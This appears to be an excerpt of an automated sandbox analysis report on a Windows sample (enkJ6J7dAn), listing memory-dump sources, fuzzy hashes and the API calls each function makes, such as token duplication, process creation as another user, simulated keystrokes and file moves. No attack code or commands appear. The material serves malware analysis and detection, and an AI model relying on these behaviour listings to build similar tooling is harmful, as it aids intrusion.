                                                                                                                    • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                                    • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                                                    • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                                    • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3031932315-0
                                                                                                                    • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                    • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                                    • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                    • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                                    APIs
                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                    • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                                                                    • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                    • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wfsopen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 197181222-0
                                                                                                                    • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                    • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                                    • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                    • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                    • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                                                                    • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                    • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 042092C9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                    • Instruction ID: 2a1075734b7313d1588d674292057b94eeb1db91198053080a187e9757154f9c
                                                                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                    • Instruction Fuzzy Hash: 8FE0BF7494010DEFDB00EFA4D5496DD7BB4EF04301F1045A1FD05D7691DB309E548A66
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 042092C9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction ID: 6d066c4fa666f5120bb93ea68dbc4bb4180ea73334f820e9a3bcbf2720422304
                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction Fuzzy Hash: 79E0E67494010DDFDB00EFB4D54969D7BF4EF04301F104561FD01D2281DA309D508A62
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                                    • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                                    • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                                    • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                                    • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                                    • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                                    • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                                    • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                                    • SendMessageW.USER32 ref: 0047CA7F
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                                    • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00930360,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                                    • ImageList_BeginDrag.COMCTL32(00930360,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                                    • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                                    • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                                    • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                                    • SendMessageW.USER32 ref: 0047CD12
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                                    • SendMessageW.USER32 ref: 0047CD80
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                                    • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                                    • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                                    • SendMessageW.USER32 ref: 0047CE93
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,03071B28,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                                    • SendMessageW.USER32 ref: 0047CF6B
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,03071B28,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                                    • API String ID: 3100379633-4164748364
                                                                                                                    • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                    • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                    • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                    • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32 ref: 00434420
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                                    • IsIconic.USER32(?), ref: 0043444F
                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 2889586943-2988720461
                                                                                                                    • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                    • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                                    • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                    • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                                    APIs
                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                                    • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                                    • _wcslen.LIBCMT ref: 00446498
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                                    • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                                    • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                                    • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                                    • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                                    • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                                    • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                                    • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                                    • String ID: $@OH$default$winsta0
                                                                                                                    • API String ID: 3324942560-3791954436
                                                                                                                    • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                                    • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                                    • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                                    • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                      • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                      • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                                                                      • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                    • _wcscat.LIBCMT ref: 0044BD94
                                                                                                                    • _wcscat.LIBCMT ref: 0044BDBD
                                                                                                                    • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                                                    • _wcscpy.LIBCMT ref: 0044BE71
                                                                                                                    • _wcscat.LIBCMT ref: 0044BE83
                                                                                                                    • _wcscat.LIBCMT ref: 0044BE95
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 2188072990-1173974218
                                                                                                                    • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                                    • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                                    • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                                    • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                                    • __swprintf.LIBCMT ref: 004789D3
                                                                                                                    • __swprintf.LIBCMT ref: 00478A1D
                                                                                                                    • __swprintf.LIBCMT ref: 00478A4B
                                                                                                                    • __swprintf.LIBCMT ref: 00478A79
                                                                                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                                    • __swprintf.LIBCMT ref: 00478AA7
                                                                                                                    • __swprintf.LIBCMT ref: 00478AD5
                                                                                                                    • __swprintf.LIBCMT ref: 00478B03
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                    • API String ID: 999945258-2428617273
                                                                                                                    • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                    • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                                    • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
